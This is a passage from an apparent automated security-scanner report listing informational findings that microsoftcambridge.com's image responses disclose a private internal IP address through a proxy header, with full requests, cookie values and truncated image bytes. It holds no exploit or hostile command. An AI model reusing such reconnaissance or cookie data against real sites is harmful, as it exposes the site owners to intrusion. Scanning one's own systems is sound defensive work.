Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Tue, 30 Mar 2010 20:11:58 GMT
Content-Length: 1461
Date: Sat, 26 Mar 2011 01:43:45 GMT
X-Varnish: 1939120343
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...1.................tEXtSoftware.Adobe ImageReadyq.e<...WIDATx..\.q.0..u]@.A................}.F.F.F.F....Zw.....H......D...~..H....oF..2^.c....s..............zz|..2N0*t....2.A..FX.2s.
...[SNIP]...
24.105. http://microsoftcambridge.com/Portals/0/teams/tick.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/tick.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/tick.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:33:07 GMT
Content-Length: 2936
Date: Sat, 26 Mar 2011 01:42:14 GMT
X-Varnish: 1939092833
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...    ...    .............tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.106. http://microsoftcambridge.com/Portals/0/teams/unifiedcom_inline.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/unifiedcom_inline.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/unifiedcom_inline.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/UnifiedCommunications/tabid/102/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Wed, 15 Apr 2009 13:58:06 GMT
Content-Length: 11813
Date: Sat, 26 Mar 2011 01:43:42 GMT
X-Varnish: 1939119478
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
24.107. http://microsoftcambridge.com/Portals/0/teams/unifiedcomimg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/unifiedcomimg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/unifiedcomimg.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/UnifiedCommunications/tabid/102/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Wed, 15 Apr 2009 13:55:07 GMT
Content-Length: 25653
Date: Sat, 26 Mar 2011 01:43:42 GMT
X-Varnish: 1939119470
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................X..
...[SNIP]...
24.108. http://microsoftcambridge.com/Portals/0/teams/unifiedcommunications.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/unifiedcommunications.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/unifiedcommunications.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/UnifiedCommunications/tabid/102/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Tue, 14 Apr 2009 21:33:00 GMT
Content-Length: 4393
Date: Sat, 26 Mar 2011 01:43:42 GMT
X-Varnish: 1939119472
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR..............$......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.109. http://microsoftcambridge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 12 Feb 2009 05:02:14 GMT
Content-Length: 3638
Date: Sat, 26 Mar 2011 01:40:35 GMT
X-Varnish: 1939061757 1939061488
Age: 1
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: HIT

...... ..........&...........h.......(... ...@........................................j-..l0..k/..i,..j,..`...^...j...f(...L...r...q...Y..g*..i-...f...y...........X..i,......................j...k....
...[SNIP]...
24.110. http://microsoftcambridge.com/images/help.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /images/help.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/help.gif HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/gif
Last-Modified: Thu, 12 Feb 2009 05:09:02 GMT
Content-Length: 344
Date: Sat, 26 Mar 2011 01:40:28 GMT
X-Varnish: 1939059692
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

GIF89a.......1j.j..............)V..........6p.%P..b.~..+\./d.)X.*Z.......0f....0g.!Hu...}........m...^.......v..d..v.....u..2k.......2n....a..m..y..u.....\z....5`.1f....>u..........I.z........2k.1i..
...[SNIP]...
24.111. http://microsoftcambridge.com/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /images/spacer.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/spacer.gif HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/gif
Last-Modified: Thu, 12 Feb 2009 05:10:58 GMT
Content-Length: 807
Date: Sat, 26 Mar 2011 01:40:30 GMT
X-Varnish: 1939060541 1939014931
Age: 159
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: HIT

GIF89a.......333777...555444qqqddd|||DDD>>>___...RRRiiilllMMM...TTTJJJ...999EEE\\\<<<YYY666mmm@@@uuuPPP.........nnnaaa...zzz:::...ggg...FFFWWW......sss```www...{{{BBB.-.............................
...[SNIP]...
24.112. http://microsoftcambridge.com/img/bottom_back.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/bottom_back.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/bottom_back.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:11:57 GMT
Content-Length: 2841
Date: Sat, 26 Mar 2011 01:40:29 GMT
X-Varnish: 1939060063
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................H....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.113. http://microsoftcambridge.com/img/events/about.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/about.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/about.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:26 GMT
Content-Length: 3155
Date: Sat, 26 Mar 2011 01:42:31 GMT
X-Varnish: 1939097608
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.114. http://microsoftcambridge.com/img/events/about_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/about_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/about_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:27 GMT
Content-Length: 3155
Date: Sat, 26 Mar 2011 01:42:40 GMT
X-Varnish: 1939100798
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.115. http://microsoftcambridge.com/img/events/community.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/community.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/community.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:30 GMT
Content-Length: 3360
Date: Sat, 26 Mar 2011 01:42:30 GMT
X-Varnish: 1939097265
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...T............[....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.116. http://microsoftcambridge.com/img/events/community_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/community_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/community_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:32 GMT
Content-Length: 3361
Date: Sat, 26 Mar 2011 01:42:40 GMT
X-Varnish: 1939100858
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...T............[....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.117. http://microsoftcambridge.com/img/events/contact_us.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/contact_us.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/contact_us.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:33 GMT
Content-Length: 829
Date: Sat, 26 Mar 2011 01:42:40 GMT
X-Varnish: 1939100797
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...n........H;[.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..X...0.5..s..    .......@....a.....CXB.....f.SO.....v..T.[m....(3....Q.?~..C.4.....%P.......#:.Y.1.. t..R.}.u......n2..O3U
...[SNIP]...
24.118. http://microsoftcambridge.com/img/events/events.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/events.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/events.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:34 GMT
Content-Length: 3355
Date: Sat, 26 Mar 2011 01:42:30 GMT
X-Varnish: 1939097253
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...4... .....]?[f....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.119. http://microsoftcambridge.com/img/events/featured_person.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/featured_person.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/featured_person.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:35 GMT
Content-Length: 989
Date: Sat, 26 Mar 2011 01:42:39 GMT
X-Varnish: 1939100462
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR............'..g....tEXtSoftware.Adobe ImageReadyq.e<...IDATx..Y...0.e....{...-!....BJ....p..PBh!%...nJ........N.8.{<..-KB.."/."........-d..>3.4...9....M.9/...n;.zz.e.5.Z.....|?...[
...[SNIP]...
24.120. http://microsoftcambridge.com/img/events/header_back.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/header_back.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/header_back.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:37 GMT
Content-Length: 2840
Date: Sat, 26 Mar 2011 01:42:39 GMT
X-Varnish: 1939100444
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.............V(......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.121. http://microsoftcambridge.com/img/events/latest_feeds.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/latest_feeds.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/latest_feeds.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:38 GMT
Content-Length: 717
Date: Sat, 26 Mar 2011 01:42:39 GMT
X-Varnish: 1939100473
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR............W......tEXtSoftware.Adobe ImageReadyq.e<...oIDATx..X.q.@..............)...J0.............)#......$c4..G.O.;i.c....-....Qo]...N?3x......0...`....`(,k`n...........R^..^..
...[SNIP]...
24.122. http://microsoftcambridge.com/img/events/latest_tweet.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/latest_tweet.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/latest_tweet.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 20 Jul 2009 20:53:33 GMT
Content-Length: 3519
